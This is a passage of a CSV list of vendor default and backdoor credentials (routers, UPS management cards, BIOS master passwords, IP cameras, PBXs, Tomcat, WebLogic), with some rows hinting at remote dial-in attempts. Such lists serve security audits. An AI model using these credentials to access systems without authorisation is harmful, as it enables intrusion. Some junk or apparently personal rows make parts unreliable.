AP.,\nampedwireless,AP20000G,router,192.168.80.240,admin,admin,2016-10-30,,\nampedwireless,AP300,AP,192.168.1.240,,,2016-10-30,,\nampedwireless,AP600EX,AP,192.168.1.240,,,2016-10-30,,\nampedwireless,R10000,router,192.168.3.1,admin,admin,2016-10-30,,\nampedwireless,R10000G,router,192.168.3.1,admin,admin,2016-10-30,,\nampedwireless,R20000G,router,192.168.3.1,admin,admin,2016-10-30,,\nampedwireless,REC10,repeater,192.168.1.240,,,2016-10-30,,\nampedwireless,RTA15,router,192.168.3.1,admin,admin,2016-10-30,,\nampedwireless,SR10000,repeater,192.168.1.240,admin,admin,2016-10-30,,\nampedwireless,SR20000G,repeater,192.168.1.240,admin,admin,2016-10-30,,\nampedwireless,SR300,repeater,192.168.1.240,,,2016-10-30,,\namptron,PC BIOS,,,,Polrty,,,\namptron,PC BIOS,,Admin,,Polrty,,,\namptron,PC BIOS,,Console,,Polrty,Admin,,\namx,CSG,,,admin,1988,,,\namx,Endeleo UDM-0102,,,,admin,,,\namx,Endeleo UDM-0404,,,,admin,,,\namx,Endeleo UDM-0808-SIG,,,administrator,password,,,\namx,Environmental Controls ENV-VST-C,,,,1988,,,\namx,IS-SPX-1000,,,,,,,\namx,MAX Server,,,root,mozart,,,\namx,MAX-CSD10,,,administrator,password,,,\namx,MET-ECOM\\=D,,,admin,1988,,,\namx,NI Series,,,NetLinx,password,,,\namx,NI Series,,,administrator,password,,,\namx,NXA-ENET24,,,Admin,1988,,,\namx,NXA-ENET24,,,guest,guest,,,\namx,NXA-ENET8POE,,,admin,1988,,,\namx,NXA-WAP200G,,192.168.1.240,admin,1988,Admin,,\namx,NXA-WAP250G,,,admin,1988,,,\namx,NXA-WAP250G,,192.168.1.240,admin,1988,Admin,,\nandover controls,Infinity,,any,acc,acc,,,\nandovercontrols,Infinity,any,Console,acc,acc,Admin,Building managment system,\nanker,Uspeed,300Mbps dual band router,192.168.0.1,admin,admin,Admin,SSID is Wireless or Wireless(5G),\nanker,Uspeed,600Mbps dual band router,192.168.0.1,admin,admin,Admin,SSID is Anker N600 2.4G or Anker N600 5G,\naoc,zenworks 4.0,,Multi,,admin,Admin,,\naopen,!OI-891,,192.168.1.1,admin,admin,Admin,,\napache project,,,Apache,jj,,,,\napache,TomCat,,HTTP,admin,admin,,,\napache,TomCat,,HTTP,admin,tomcat,,,\napache,TomCat,,HTTP,role,changethis,,,\napache,TomCat,,HTTP,role1,role1,,,\napache,TomCat,,HTTP,root,changethis,,,\napache,TomCat,,HTTP,root,root,,,\napache,TomCat,,HTTP,tomcat,changethis,,,\napache,TomCat,,HTTP,tomcat,tomcat,,,\napache,Tomcat,,,admin,tomcat,,,\napache,Tomcat,,,role,changethis,,,\napache,Tomcat,,,role1,role1,,,\napache,Tomcat,,,root,changethis,,,\napache,Tomcat,,,tomcat,tomcat,,,\napache,jboss4,,jmx-console,admin,jboss4,,,\napc,9606 Smart Slot,,,,backdoor,,,\napc,9606 Smart Slot,,Telnet,,backdoor,Admin,,\napc,9606 Smart Slot,AOS 3.2.1 and AOS 3.0.3,Telnet,(any),TENmanUFactOryPOWER,,,\napc,AP9606 SmartSlot Web/SNMP Management Card,,AOS 3.2.1 and AOS 3.0.3,(any),TENmanUFactOryPOWER,,,\napc,AP9606,,,apc,apc,Admin,,\napc,Any,,,apcuser,apc,,,\napc,Call-UPS,,AP9608,,serial number of the Call-UPS,,,\napc,Call-UPS,AP9608,Console,,(Device Serial Number),Admin,,\napc,Galagy 5000,,Browser,MGEUPS,MGEUPS,,,\napc,MasterSwitch,,AP9210,apc,apc,,,\napc,MasterSwitch,AP9210,,apc,apc,Admin,,\napc,PowerChute Bussiness Edition,,Installed program,Pingo,Ura,Admin access,,\napc,Powerchute Plus,,4.x for Netware 3.x/4.x,POWERCHUTE,APC,,,\napc,Powerchute Plus,4.x for Netwware 3.x/4.x,Console,POWERCHUTE,APC,Admin,,\napc,SNMP Adapter,,2.x,apc,apc,,,\napc,SNMP Adapter,2.x,,apc,apc,,,\napc,Share-UPS,,AP9207,,serial number of the Share-UPS,,,\napc,Share-UPS,AP9207,Console,,(Device Serial Number),Admin,,\napc,Smart UPS,,Multi,apc,apc,Admin,,\napc,Smartups 3000,,HTTP,apc,apc,Admin,,\napc,Smartups 5000,,HTTP,apc,apc,admin,,\napc,UPS Network Management Card 2,,,device,apc,,,\napc,UPS Network Management Card 2,,,readonly,apc,,,\napc,UPS,,,apc,apc,,,\napc,UPS,,Admin,apc,apc,,,\napc,UPS,,Telnet,apc,apc,Admin,,\napc,UPSes (Web/SNMP Mgmt Card),,HTTP,device,device,Admin,Secondary access account (next to apc/apc),\napc,USV Network Management Card,,,,TENmanUFactOryPOWER,,,\napc,USV Network Management Card,,SNMP,,TENmanUFactOryPOWER ,Admin,nachzulesen unter http://www.heise.de/security/news/meldung/44899 gruss HonkHase,\napc,USV Network Management Card,,SNMP,,TENmanUFactOryPOWER,Admin,nachzulesen unter http://www.heise.de/security/news/meldung/44899 gruss HonkHase,\napc,Web/SNMP Management Card,,AP9606,apc,apc,,,\napple computer,Airport,,,,public,,,\napple computer,Network Assistant,,,,xyzzy,,,\napple computer,Remote Desktop,,,,xyzzy,,,\napple,A1034,,10.0.1.1,,,Admin,,\napple,AirPort Base Station (Graphite),,2,,public,,,\napple,AirPort Base Station (Graphite),2,Multi,,public,public,See Apple article number 58613 for details,\napple,Airport Base Station (Dual Ethernet),,2,,password,,,\napple,Airport Base Station (Dual Ethernet),2,Multi,,password,Guest,See Apple article number 106597 for details,\napple,Airport Base Station (Graphite),2,Multi,,public,public,See Apple article number 58613 for details,\napple,Airport Extreme Base Station,,2,,admin,,,\napple,Airport Extreme Base Station,2,Multi,,admin,Guest,see Apple article number 107518 for details,\napple,Airport,,,,public,,1.1,\napple,Airport,,Administrative,admin,public,,,\napple,Airport,,Other,admin,public,Administrative,,\napple,Airport,5,1.0.09,Multi,root,admin,,\napple,Airport,5,1.0.09,Multi,root,admin,192.168.1.1,\napple,Airport,Express,10.0.0.1,,,,,\napple,Airport,Extreme,10.0.1.1,,public,,,\napple,Airport,Graphite,192.42.249.13,(no username),public,User,,\napple,AppleTV,2,ssh,root,alpine,root,,\napple,Jailbroken iPad/iPhone,4.3.0+,SSH,root,alpine,root,Only on jailbroken iDevices.,\napple,Network Assistant,,,,xyzzy,Admin,3.X,\napple,Network Assistant,,,None,xyzzy,Admin,3.X,\napple,Remote Desktop,,,,xyzzy,Admin,,\napple,iPhone,,,mobile,dottie,,,\napple,iPhone,,,root,alpine,,,\napple,iPod Touch,,,root/mobile,alpine,,,\narcor,Easybox,all,http://192.168.2.1,root,123456,Root,,\narcwireless,FreeStation 5 AP,,192.168.10.1,admin,admin,Admin,SSID is arcweb,\nareca,RAID controllers,,Console,admin,0,Admin,,\narescom,modem/router ,10XX,Telnet,,atc123,Admin,,\narescom,modem/router,10XX,Telnet,,atc123,Admin,,\narlotto,SG205,,HTTP,admin,123456,https://192.168.2.1,,\narlotto,SG205,,https://192.168.2.1,admin,123456,,,\narmenia,Forum,,No,admin,admin,,,\narris,TG852G,All,192.168.100.1,admin,password,Admin,,\narris,Touchstone Gateway,,,admin,password,,,\narrowpoint,Any,,,admin,system,Admin,,\narrowpoint,Unknown,,,,,,,\narrowpoint,Unknown,,,admin,system,,,\narrowpoint,Various,,,,,Admin,,\narrowpoint,windows xp,all,192.168.0.1,admin,arrowpoint,,,\nartem,ComPoint - CPD-XT-b,CPD-XT-b,Telnet,,admin,Admin,,\nasante,FM2008,,Multi,admin,asante,Admin,,\nasante,FM2008,,Telnet,superuser,,Admin,,\nasante,FM2008,01.06,Telnet,superuser,asante,Admin,,\nasante,FM2008,1.06,Telnet,superuser,asante,Admin,,\nasante,IntraStack,,,IntraStack,Asante,,,\nasante,IntraStack,,Admin,IntraStack,Asante,,,\nasante,IntraStack,,multi,IntraStack,Asante,Admin,,\nasante,IntraSwitch,,,IntraSwitch,Asante,,,\nasante,IntraSwitch,,Admin,IntraSwitch,Asante,,,\nasante,IntraSwitch,,multi,IntraSwitch,Asante,Admin,,\nascend,All TAOS models,,,admin,Ascend,,all,\nascend,Router,,,,ascend,,,\nascend,Router,,Admin,,ascend,,,\nascend,Router,,Telnet,,ascend,Admin,,\nascend,Sahara,,,root,ascend,,,\nascend,Sahara,,Multi,root,ascend,,,\nascend,Yurie,,,readonly,lucenttech2,,,\nascend,Yurie,,,readwrite,lucenttech1,,,\nascend,Yurie,,Multi,readonly,lucenttech2,,,\nascend,Yurie,,Multi,readwrite,lucenttech1,,,\nascom,Ascotel PBX,,ALL,,3ascotel,,,\nascom,Ascotel PBX,ALL,Multi,,3ascotel,Admin,,\nascom,Ascotel,,,,3ascotel,,,\nasdsa,sadsa,,asdsad,12321,sadsad,,,\nasmack,router,ar804u,HTTP,admin,epicrouter,Admin,,\nasmax,AR701u / ASMAX AR6024,,HTTP,admin,epicrouter,Admin,,\nasmax,AR800C2,,HTTP,admin,epicrouter,Admin,,\nasmax,Ar-804u,,HTTP,admin,epicrouter,Admin,,\naspect,ACD,,6,DTA,TJM,,,\naspect,ACD,,6,customer,,,,\naspect,ACD,,7,DTA,TJM,,,\naspect,ACD,,8,DTA,TJM,,,\naspect,ACD,,User,DTA,TJM,,,\naspect,ACD,,User,customer,,,,\naspect,ACD,6,HTTP,customer,,User,views error logs,\naspect,ACD,6,Oracle,DTA,TJM,User,,\naspect,ACD,7,Oracle,DTA,TJM,User,,\naspect,ACD,8,Oracle,DTA,TJM,User,,\nast,PC BIOS,,,,SnuFG5,,,\nast,PC BIOS,,Admin,,SnuFG5,,,\nast,PC BIOS,,Console,,SnuFG5,Admin,,\nast,Powerexec 4/25sl,,Multi,,,Admin,,\nast,powerexec 4/25sl,,,,,,,\nast,powerexec 4/25sl,,Admin,,,,,\nasus,6310EV,,,adsl,adsl1234,,,\nasus,6310EV,,Multi,adsl,adsl1234,,,\nasus,ACPIBIOS,,,,,,,\nasus,L3800,,,,,,,\nasus,P5P800,,Multi,,admin,User,,\nasus,RT-AC5300,,http://router.asus.com,admin,admin,admin,,\nasus,RT-N11,All,192.168.1.1,admin,admin,Admin,,\nasus,RT-N12,All,192.168.1.1,admin,admin,Admin,,\nasus,RT-N13,All,192.168.1.1,admin,admin,Admin,,\nasus,RT-N13U,All,192.168.1.1,admin,admin,Admin,,\nasus,RT-N15,All,192.168.1.1,admin,admin,Admin,,\nasus,RT-N16,,,admin,admin,,,\nasus,RT-N16,All,192.168.1.1,admin,admin,Admin,,\nasus,RT-N56U,All,192.168.1.1,admin,admin,Admin,,\nasus,WL-300,All,HTTP,admin,admin,Admin,,\nasus,WL-330g,All,192.168.1.221,admin,admin,Admin,,\nasus,WL-500G Deluxe,,HTTP,admin,admin,Admin,,\nasus,WL-500G,,HTTP,admin,admin,Admin,,\nasus,WL-500G,1.7.5.6,HTTP,admin,admin,Admin,,\nasus,WL-500W,All,192.168.1.1,admin,admin,Admin,,\nasus,WL-503G,All,HTTP,admin,admin,Admin,,\nasus,WL-520G,,192.168.1.1,admin,admin,Admin,,\nasus,WL-520G,,HTTP,admin,admin,Admin,,\nasus,WL-520GC,All,192.168.1.1,admin,admin,Admin,,\nasus,WL-520GU,All,192.168.1.1,admin,,Admin,,\nasus,WL-600G,All,192.168.1.1,admin,admin,Admin,,\nasus,WL-AM602,All,192.168.1.1,admin,admin,Admin,,\nasus,WL-AM604g,All,192.168.1.1,admin,admin,Admin,,\nasus,WL-HDD2.5,,,admin,admin,Admin,Default IP 192.168.1.220,\naszs,graphick,,jkl,Administrator,admin,,,\nat&,T,,mcp,Console,,,,\nat&t,3B2 Firmware,,,,mcp,,,\natcom,AG-168FC,,http://192.168.1.100,,12345678,Administration,,\natheros,AR5BAP-0030,,192.168.1.1,Admin,5up,Administration,,\natheros,AR5BAP-0032,,192.168.1.1,Admin,5up,Administration,,\natheros,AR5BAP-0033,,192.168.1.1,Admin,5up,Administration,,\natlantis,A02-RA141,,Multi,admin,atlantis,Admin,,\natlantis,I-Storm Lan Router ADSL ,,Multi,admin,atlantis,Admin,,\natlantis,I-Storm Lan Router ADSL,,Multi,admin,atlantis,Admin,,\natlantis,Web Share RB,Web Share RB,http://192.168.1.1,santus,marika,,,\natlassian,Crowd,,,Crowd,password,,,\natlassian,Crowd,,,Demo,password,,,\natlassian,Crowd,,,Username,password,,,\natlassian,Crowd,,,crowd­-openid-­server,password,,,\natt,3B2 Firmware,,Console,,mcp,Admin,,\natt,EP5962 2-Line Cordless Phone System,,by telephone,,5000,Mailbox access,,\natt,Starlan SmartHUB,,,N/A,manager,,9.9,\nattachmate,Attachmate Gateway,,,,PASSWORD,,,\nattachmate,Attachmate Gateway,,Console,,PASSWORD,Admin,,\naudioactive,MPEG Realtime Encoders,,,,telos,,,\naudioactive,MPEG Realtime Encoders,,Telnet,,telos,Admin,,\nautodesk,Autocad,,,autocad,autocad,,,\nautodesk,Autocad,,Multi,autocad,autocad,User,,\nautodesk,Autocad,,User,autocad,autocad,,,\navaya,4602 SIP Telephone,1.1.HTTP,admin,barney,,,,\navaya,CMS Supervisor,,11,root,cms500,,,\navaya,CMS Supervisor,11,Console,root,cms500,Admin,,\navaya,Cajun P33x,,Admin,,admin,,,\navaya,Cajun P33x,,firmware before 3.11.0,,admin,,,\navaya,Cajun P33x,firmware before 3.11.0,SNMP,,admin,Admin,,\navaya,Cajun P33x,firmware before 3.11.0,SNMP,,admin,Admin,check the Bugtraq archives for more information,\navaya,Cajun Pxxx,,,root,root,,,\navaya,Cajun Pxxx,,Admin,root,root,,,\navaya,Cajun Pxxx,,Multi,root,root,Admin,,\navaya,Cajun,,Admin,,,,,\navaya,Cajun,,Developer,diag,danger,,,\navaya,Cajun,,Developer,manuf,xxyyzz,,,\navaya,Cajun,,P550R P580 P880 and P882,diag,danger,,,\navaya,Cajun,,P550R P580 P880 and P882,manuf,xxyyzz,,,\navaya,Cajun,,P550R/P580/P880/P882,,,,,\navaya,Cajun,P550R P580 P880 and P882,Multi,diag,danger,Developer,,\navaya,Cajun,P550R P580 P880 and P882,Multi,manuf,xxyyzz,Developer,,\navaya,Cajun,P550R/P580/P880/P882,Telnet,,,Admin,,\navaya,Definity,,Admin,craft,,,,\navaya,Definity,,G3Si,craft,,,,\navaya,Definity,,Multi,dadmin,dadmin01,Admin,,\navaya,Definity,G3Si,Multi,craft,,Admin,,\navaya,IMD,,,admin,admin123,Admin,,\navaya,IP Office,500, 406,Default IP: 192.168.42.1, you can use ISDN modem to dial into remote systems- try last few numbers of ranges eg. xxxxxxxx99 or xxxxxxxx98, Administrator,Admin,\navaya,IP Office,500,Default IP: 192.168.42.1 - you can use ISDN modem to dial into remote systems- try last few numbers of ranges eg. xxxxxxxx99 or xxxxxxxx98,,Administrator,Administrator (default) - Older versions use \"\"password\"\",Downlaod Avaya management software from Avaya.com (free download) if you are on the same network as the phone system; open up manger and it will look for broadcasts from the system; select it and try the default u/p,\navaya,P330 Stackable Switch,,,root,root,,,\navaya,Pxxx,,5.2.14,diag,danger,,,\navaya,Pxxx,,5.2.14,manuf,xxyyzz,,,\navaya,Pxxx,,Admin,diag,danger,,,\navaya,Pxxx,,Admin,manuf,xxyyzz,,,\navaya,Pxxx,5.2.14,Multi,diag,danger,Admin,,\navaya,Pxxx,5.2.14,Multi,manuf,xxyyzz,Admin,,\navaya,Routers,Various,telnet,root,root,Admin,,\navaya,Scopia Gateway,,,admin,password,,,\navaya,Scopia,,,admin,admin,,,\navaya,definity,,Admin,craft,crftpw,,,\navaya,definity,,up to rev. 6,craft,crftpw,,,\navaya,definity,up to rev. 6,any,craft,crftpw,Admin,,\navaya,g3R,,Admin,root,ROOT500,,,\navaya,g3R,,v6,root,ROOT500,,,\navaya,g3R,v6,Console,root,ROOT500,Admin,,\navaya,g3si,,,,,,,\navaya,routers,,,root,root,,,\navenger news system (ans),ANS,,,,Administrative,,,\navengernewssystem,Avenger News System,,HTTP,,Administrative,,default string: admin:aaLR8vE.jjhss:root@127.0.0.1 pass file is located at ans_data/ans.passwd (relative to ans.pl location),\naward,6,,,,,,,\naward,6.00PG,,,,,,,\naward,BIOS,,,,lkwpeter,,,\naward,BIOS,,Admin,,lkwpeter,,,\naward,Bios,,6,,,,,\naward,PC BIOS,,,,1322222,,,\naward,PC BIOS,,,,SER,,,\naward,PC BIOS,,,AWARD_SW,,,,\naward,PC BIOS,,Admin,,01322222,,,\naward,PC BIOS,,Admin,,256256,,,\naward,PC BIOS,,Admin,,?award,,,\naward,PC BIOS,,Admin,,AWARD_SW,,,\naward,PC BIOS,,Admin,,BIOS,,,\naward,PC BIOS,,Admin,,CONCAT,,,\naward,PC BIOS,,Admin,,CONDO,,,\naward,PC BIOS,,Admin,,HELGA-S,,,\naward,PC BIOS,,Admin,,HEWITT RAND,,,\naward,PC BIOS,,Admin,,HLT,,,\naward,PC BIOS,,Admin,,PASSWORD,,,\naward,PC BIOS,,Admin,,SER,,,\naward,PC BIOS,,Admin,,SKY_FOX,,,\naward,PC BIOS,,Admin,,SWITCHES_SW,,,\naward,PC BIOS,,Admin,,SZYX,,,\naward,PC BIOS,,Admin,,Sxyz,,,\naward,PC BIOS,,Admin,,TTPTHA,,,\naward,PC BIOS,,Admin,,TzqF,,,\naward,PC BIOS,,Admin,,aLLy,,,\naward,PC BIOS,,Admin,,aPAf,,,\naward,PC BIOS,,Admin,,admin,,,\naward,PC BIOS,,Admin,,alfarome,,,\naward,PC BIOS,,Admin,,award,,,\naward,PC BIOS,,Admin,,awkward,,,\naward,PC BIOS,,Admin,,biosstar,,,\naward,PC BIOS,,Admin,,biostar,,,\naward,PC BIOS,,Admin,,g6PJ,,,\naward,PC BIOS,,Admin,,h6BB,,,\naward,PC BIOS,,Admin,,j09F,,,\naward,PC BIOS,,Admin,,j256,,,\naward,PC BIOS,,Admin,,j262,,,\naward,PC BIOS,,Admin,,j322,,,\naward,PC BIOS,,Admin,,j64,,,\naward,PC BIOS,,Admin,,lkw peter,,,\naward,PC BIOS,,Admin,,lkwpeter,,,\naward,PC BIOS,,Admin,,setup,,,\naward,PC BIOS,,Admin,,t0ch20x,,,\naward,PC BIOS,,Admin,,t0ch88,,,\naward,PC BIOS,,Admin,,wodj,,,\naward,PC BIOS,,Admin,,zbaaaca,,,\naward,PC BIOS,,Console,,(eight spaces),Admin,The password is eight spaces on some versions,\naward,PC BIOS,,Console,,01322222,Admin,,\naward,PC BIOS,,Console,,1322222,Admin,,\naward,PC BIOS,,Console,,256256,Admin,,\naward,PC BIOS,,Console,,589589,Admin,,\naward,PC BIOS,,Console,,589721,Admin,,\naward,PC BIOS,,Console,,595595,Admin,,\naward,PC BIOS,,Console,,598598,Admin,,\naward,PC BIOS,,Console,,?award,Admin,,\naward,PC BIOS,,Console,,ALFAROME,Admin,,\naward,PC BIOS,,Console,,ALLY,Admin,,\naward,PC BIOS,,Console,,ALLy,Admin,,\naward,PC BIOS,,Console,,AWARD PW,Admin,,\naward,PC BIOS,,Console,,AWARD SW,Admin,,\naward,PC BIOS,,Console,,AWARD?SW,Admin,,\naward,PC BIOS,,Console,,AWARD_PW,Admin,,\naward,PC BIOS,,Console,,AWARD_SW,Admin,,\naward,PC BIOS,,Console,,AWKWARD,Admin,,\naward,PC BIOS,,Console,,BIOS,Admin,,\naward,PC BIOS,,Console,,BIOSTAR,Admin,,\naward,PC BIOS,,Console,,CONCAT,Admin,,\naward,PC BIOS,,Console,,CONDO,Admin,,\naward,PC BIOS,,Console,,Condo,Admin,,\naward,PC BIOS,,Console,,HELGA-S,Admin,,\naward,PC BIOS,,Console,,HEWITT RAND,Admin,,\naward,PC BIOS,,Console,,HLT,Admin,,\naward,PC BIOS,,Console,,J256,Admin,,\naward,PC BIOS,,Console,,J262,Admin,,\naward,PC BIOS,,Console,,KDD,Admin,,\naward,PC BIOS,,Console,,LKWPETER,Admin,,\naward,PC BIOS,,Console,,Lkwpeter,Admin,,\naward,PC BIOS,,Console,,PASSWORD,Admin,,\naward,PC BIOS,,Console,,PINT,Admin,,\naward,PC BIOS,,Console,,SER,Admin,,\naward,PC BIOS,,Console,,SKY_FOX,Admin,,\naward,PC BIOS,,Console,,SWITCHES_SW,Admin,,\naward,PC BIOS,,Console,,SW_AWARD,Admin,,\naward,PC BIOS,,Console,,SXYZ,Admin,,\naward,PC BIOS,,Console,,SZYX,Admin,,\naward,PC BIOS,,Console,,Sxyz,Admin,,\naward,PC BIOS,,Console,,TTPTHA,Admin,,\naward,PC BIOS,,Console,,TzqF,Admin,,\naward,PC BIOS,,Console,,ZAAAADA,Admin,,\naward,PC BIOS,,Console,,ZAAADA,Admin,,\naward,PC BIOS,,Console,,ZBAAACA,Admin,,\naward,PC BIOS,,Console,,ZJAAADC,Admin,,\naward,PC BIOS,,Console,,_award,Admin,,\naward,PC BIOS,,Console,,aLLY,Admin,,\naward,PC BIOS,,Console,,aLLy,Admin,,\naward,PC BIOS,,Console,,aPAf,Admin,,\naward,PC BIOS,,Console,,admin,Admin,,\naward,PC BIOS,,Console,,alfarome,Admin,,\naward,PC BIOS,,Console,,award,Admin,,\naward,PC BIOS,,Console,,award.sw,Admin,,\naward,PC BIOS,,Console,,award_?,Admin,,\naward,PC BIOS,,Console,,award_ps,Admin,,\naward,PC BIOS,,Console,,awkward,Admin,,\naward,PC BIOS,,Console,,biosstar,Admin,,\naward,PC BIOS,,Console,,biostar,Admin,,\naward,PC BIOS,,Console,,condo,Admin,,\naward,PC BIOS,,Console,,d8on,Admin,,\naward,PC BIOS,,Console,,djonet,Admin,,\naward,PC BIOS,,Console,,efmukl,Admin,,\naward,PC BIOS,,Console,,g6PJ,Admin,,\naward,PC BIOS,,Console,,h6BB,Admin,,\naward,PC BIOS,,Console,,j09F,Admin,,\naward,PC BIOS,,Console,,j256,Admin,,\naward,PC BIOS,,Console,,j262,Admin,,\naward,PC BIOS,,Console,,j322,Admin,,\naward,PC BIOS,,Console,,j64,Admin,,\naward,PC BIOS,,Console,,kdd,Admin,,\naward,PC BIOS,,Console,,lkw peter,Admin,,\naward,PC BIOS,,Console,,lkwpeter,Admin,,\naward,PC BIOS,,Console,,lkwpeter,Admin,Note - After 1996-12-19 Award required each OEM to set their own password,\naward,PC BIOS,,Console,,pint,Admin,,\naward,PC BIOS,,Console,,setup,Admin,,\naward,PC BIOS,,Console,,sxyz,Admin,,\naward,PC BIOS,,Console,,t0ch20x,Admin,,\naward,PC BIOS,,Console,,t0ch88,Admin,,\naward,PC BIOS,,Console,,wodj,Admin,,\naward,PC BIOS,,Console,,zbaaaca,Admin,,\naward,PC BIOS,,Console,,zjaaadc,Admin,,\naward,award,,6,,,,,\naward,bios,,1.0A,,,,,\naward,bios,,4.6,admin,admin,,,\naward,v4.51PG,,Admin,,SY_MB,,,\naward,v4.51PG,,v4.51PG,,SY_MB,,,\naward,v4.51PG,v4.51PG,Multi,,SY_MB,Admin,,\naxent,NetProwler manager,,,administrator,admin,,WinNT,\naximcom,MR-102N,All,,admin,admin,Admin,,\naximcom,MR-105N,All,192.168.0.1,admin,admin,Admin,,\naximcom,MR-108N,All,192.168.1.1:8080,admin,admin,Admin,,\naximcom,PGP-108N,All,192.168.0.1,admin,admin,Admin,,\naxis,200 Network Camera,,,root,pass,,,\naxis,200 V1.32,,,admin,,,,\naxis,200+ Network Camera,,,root,pass,,,\naxis,2100 Network Camera,,,root,pass,,,\naxis,2110 Network Camera,,,root,pass,,,\naxis,2120 Network Camera,,,root,pass,,,\naxis,2420 Network Camera,,,root,pass,,,\naxis,540 Print Server,,Multi,root,pass,Admin,,\naxis,540+ Print Server,,Multi,root,pass,Admin,,\naxis,542 Print Server,,Multi,root,pass,Admin,,\naxis,All Axis Printserver,All,Multi,root,pass,Admin,,\naxis,NETCAM,,200/240,root,pass,,,\naxis,NETCAM,,Admin,root,pass,,,\naxis,NETCAM,200/240,,root,pass,,,\naxis,NETCAM,200/240,Telnet,root,pass,Admin,,\naxis,NPS 530,,,root,pass,,5.02,\naxis,StorPoint CD100,,,root,pass,,4.28,\naxis,StorPoint CDE100,,,root,pass,,,\naxis,StorPoint NAS 100,,,root,pass,,,\naxis,Webcams,,HTTP,root,pass,Admin,,\naxus,AXUS YOTTA,,Multi,,0,Admin,Storage DAS SATA to SCSI/FC,\naxway,SecureTransport,,,setup,setup,,,\naxway,synchronization gateway,,,admin,Secret1,Admin,,\naztech,DSL-3100R,,192.168.1.1,,,Admin,,\naztech,DSL-600E,,HTTP,admin,admin,Admin,,\naztech,DSL-600ER,,192.168.1.1,Admin,Admin,Admin,,\naztech,windows xp, all models,38.4.2,192.168.1.1,admin,admin,,\nbacktrack,backtrack 4,,CLI,root,toor,,,\nbarco,ClickShare,,,,clickshare,,,\nbarco,ClickShare,,,admin,admin,,,\nbarracuda,SSL VPN,,,admin,admin,,,\nbarracuda,SSL VPN,,,ssladmin,ssladmin,,,\nbarracudanetworks,Barracuda Spam Firewall 300,,http://:8000,admin,admin,full admin access,,\nbarracudanetworks,Barracuda Spam Firewall 300,,http://lt;deviceIPgt;:8000,admin,admin,full admin access,,\nbarracudanetworks,Barracuda Spam Firewall,3.3.01.001 to 3.3.03.053,http://:8080,admin,adminbn99,full admin access,,\nbarracudanetworks,Barracuda Spam Firewall,3.3.01.001 to 3.3.03.053,http://:8080,guest,bnadmin99,guest access - some information disclosure,,\nbarracudanetworks,Barracuda Spam Firewall,3.3.01.001 to 3.3.03.053,http://lt;deviceIPgt;:8080,admin,adminbn99,full admin access,,\nbarracudanetworks,Barracuda Spam Firewall,3.3.01.001 to 3.3.03.053,http://lt;deviceIPgt;:8080,guest,bnadmin99,guest access - some information disclosure,,\nbarracudanetworks,Barracuda Spyware Firewall,,http://:8000,admin,admin,full admin access,,\nbarracudanetworks,Barracuda Spyware Firewall,,http://lt;deviceIPgt;:8000,admin,admin,full admin access,,\nbauschdatacom,Proxima PRI ADSL PSTN Router4 Wireless,,Multi,admin,epicrouter,Admin,,\nbay networks,Router,,,Manager,,,,\nbay networks,Router,,,User,,,,\nbay networks,Router,,Admin,Manager,,,,\nbay networks,Router,,User,User,,,,\nbay networks,SuperStack II,,,security,security,,,\nbay networks,SuperStack II,,Admin,security,security,,,\nbay networks,Switch,,350T,,NetICs,,,\nbay networks,Switch,,Admin,,NetICs,,,\nbaynetworks,ASN / ARN Routers,,,Manager,Manager,,Any,\nbaynetworks,Accelar 1xxx switches,,,rwa,rwa,,Any,\nbaynetworks,Remote Annex 2000,,,admin,IP address,,Any,\nbaynetworks,Router,,,User,,User,,\nbaynetworks,Router,,Telnet,Manager,,Admin,,\nbaynetworks,Router,,Telnet,User,,User,,\nbaynetworks,SuperStack II,,,security,security,Admin,,\nbaynetworks,SuperStack II,,Telnet,security,security,Admin,,\nbaynetworks,Switch,350T,,,NetICs,Admin,,\nbaynetworks,Switch,350T,Telnet,,NetICs,Admin,,\nbea,WebLogic Process Integrator,,2.0,admin,security,,,\nbea,WebLogic Process Integrator,,2.0,joe,password,,,\nbea,WebLogic Process Integrator,,2.0,mary,password,,,\nbea,WebLogic Process Integrator,,2.0,system,security,,,\nbea,WebLogic Process Integrator,,2.0,wlcsystem,wlcsystem,,,\nbea,WebLogic Process Integrator,,2.0,wlpisystem,wlpisystem,,,\nbea,WebLogic,,,system,weblogic,,,\nbea,WebLogic,,Admin,system,weblogic,,,\nbea,WebLogic,,https,system,weblogic,Admin,,\nbea,WebLogic,9.0 beta (Diablo),,weblogic,weblogic,,,\nbea,Weblogic Process Integrator,2,,admin,security,,,\nbea,Weblogic Process Integrator,2,,joe,password,,,\nbea,Weblogic Process Integrator,2,,mary,password,,,\nbea,Weblogic Process Integrator,2,,system,security,,,\nbea,Weblogic Process Integrator,2,,wlcsystem,wlcsystem,,,\nbea,Weblogic Process Integrator,2,,wlpisystem,wlpisystem,,,\nbea,Weblogic Process Integrator,2.0,,admin,security,,,\nbea,Weblogic Process Integrator,2.0,,joe,password,,,\nbea,Weblogic Process Integrator,2.0,,mary,password,,,\nbea,Weblogic Process Integrator,2.0,,system,security,,,\nbea,Weblogic Process Integrator,2.0,,wlcsystem,wlcsystem,,,\nbea,Weblogic Process Integrator,2.0,,wlpisystem,wlpisystem,,,\nbea,Weblogic,,,system,weblogic,,5.1,\nbecu,accpints summary,,,musi1921,Musii%1921,,,\nbeetal,220x ADSL router,any,http://192.168.1.1,admin,password,admin,should be same for all routers,\nbelkin,,,192.168.2.1,,,guest,,\nbelkin,Belkin_N+_61F980,,Password,Belkin_N+_61F980,,,,\nbelkin,F1PG200ENau,,,,admin,,,\nbelkin,F1PG200ENau,,10.1.1.1,,admin,Admin,,\nbelkin,F1PG210ENau,,10.1.1.1,,admin,Admin,,\nbelkin,F1PI241EGau,,10.1.1.1,,admin,Admin,,\nbelkin,F1PI241ENau,,10.1.1.1,,admin,Admin,,\nbelkin,F1PI242EGau,,10.1.1.1,,admin,Admin,,\nbelkin,F5D5231-4,,http://192.168.2.1,,,Administration,,\nbelkin,F5D5630au4,,10.1.1.1,,admin,Admin,,\nbelkin,F5D5730au,,10.0.0.1 or 10.1.1.1,admin,password,Admin,,\nbelkin,F5D6130,,,,MiniAP,,,\nbelkin,F5D6130,,Admin,,MiniAP,,,\nbelkin,F5D6130,,SNMP,,MiniAP,Admin,Wireless Acess Point IEEE802.11b,\nbelkin,F5D6231-4 Router,,,,,,,\nbelkin,F5D6231-4,,V1.0 - 2.0,,,,,\nbelkin,F5D7150,FB,Multi,,admin,Admin,,\nbelkin,F5D7230-4 Router,,,,,,,\nbelkin,F5D7230-4,,192.168.2.1 or 192.168.2.254,Administrator,,Admin,,\nbelkin,F5D7231-4,,http://192.168.2.1,,,Administration,,\nbelkin,F5D7234 